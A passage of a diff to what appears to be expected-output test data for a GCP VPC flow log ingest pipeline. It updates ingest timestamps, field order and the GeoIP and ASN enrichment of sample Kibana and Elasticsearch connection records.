"67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.392440100Z", + "ingested": "2021-12-14T14:43:27.415292483Z", "original": "{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:44:50.809605761Z", @@ -22853,44 +23931,21 @@ "id": "1gq7q7afe373f5", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 56478, - "bytes": 1458, - "ip": "67.43.156.14", - "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", - "bytes": 1458, + "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", + "bytes": 1776, "transport": "tcp", "type": "ipv4", "iana_number": "6", "packets": 7, - "direction": "inbound" - }, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22901,6 +23956,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -22921,8 +23979,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 56478, + "bytes": 1458, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.392445700Z", + "ingested": "2021-12-14T14:43:27.415292871Z", "original": "{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:20.450631492Z", @@ -22930,6 +24013,18 @@ "id": "1gq7q7afe373f6", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", + "bytes": 1458, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -22938,11 +24033,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 52430, @@ -23020,7 +24120,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392451200Z", + "ingested": "2021-12-14T14:43:27.415293260Z", "original": "{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", @@ -23031,44 +24131,9 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 34536, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1780, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", - "bytes": 1780, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.763Z", - "ecs": { - "version": "1.12.0" + "@timestamp": "2019-06-14T03:50:17.763Z", + "ecs": { + "version": "1.12.0" }, "related": { "ip": [ @@ -23076,6 +24141,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -23096,8 +24164,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 34536, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1780, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.392456800Z", + "ingested": "2021-12-14T14:43:27.415293677Z", "original": "{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:51.050074134Z", @@ -23105,6 +24198,18 @@ "id": "1gq7q7afe373ek", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", + "bytes": 1780, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -23119,11 +24224,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -23195,7 +24305,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392462700Z", + "ingested": "2021-12-14T14:43:27.415294136Z", "original": "{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", @@ -23217,11 +24327,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -23293,7 +24408,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392468100Z", + "ingested": "2021-12-14T14:43:27.415294530Z", "original": "{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -23315,11 +24430,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53096, @@ -23391,7 +24511,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392473600Z", + "ingested": "2021-12-14T14:43:27.415294914Z", "original": "{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", @@ -23407,11 +24527,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53096, @@ -23489,7 +24614,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392479200Z", + "ingested": "2021-12-14T14:43:27.415295841Z", "original": "{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", @@ -23511,11 +24636,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33966, @@ -23587,7 +24717,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392484800Z", + "ingested": "2021-12-14T14:43:27.415296273Z", "original": "{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", @@ -23598,18 +24728,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.763Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 96 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65318, @@ -23623,6 +24786,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415296655Z", + "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760345858Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "1gq7q7afe373ev", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -23634,25 +24807,24 @@ "iana_number": "6", "packets": 583, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 96 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -23663,23 +24835,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392490400Z", - "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760345858Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "1gq7q7afe373ev", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -23688,11 +24851,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34536, @@ -23700,6 +24868,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415297051Z", + "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:51.050074134Z", + "end": "2019-06-14T03:47:51.162931667Z", + "id": "1gq7q7afe373em", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -23711,19 +24889,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.87.40.76", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -23734,36 +24923,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392495900Z", - "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:51.050074134Z", - "end": "2019-06-14T03:47:51.162931667Z", - "id": "1gq7q7afe373em", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56478, @@ -23777,6 +24950,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": 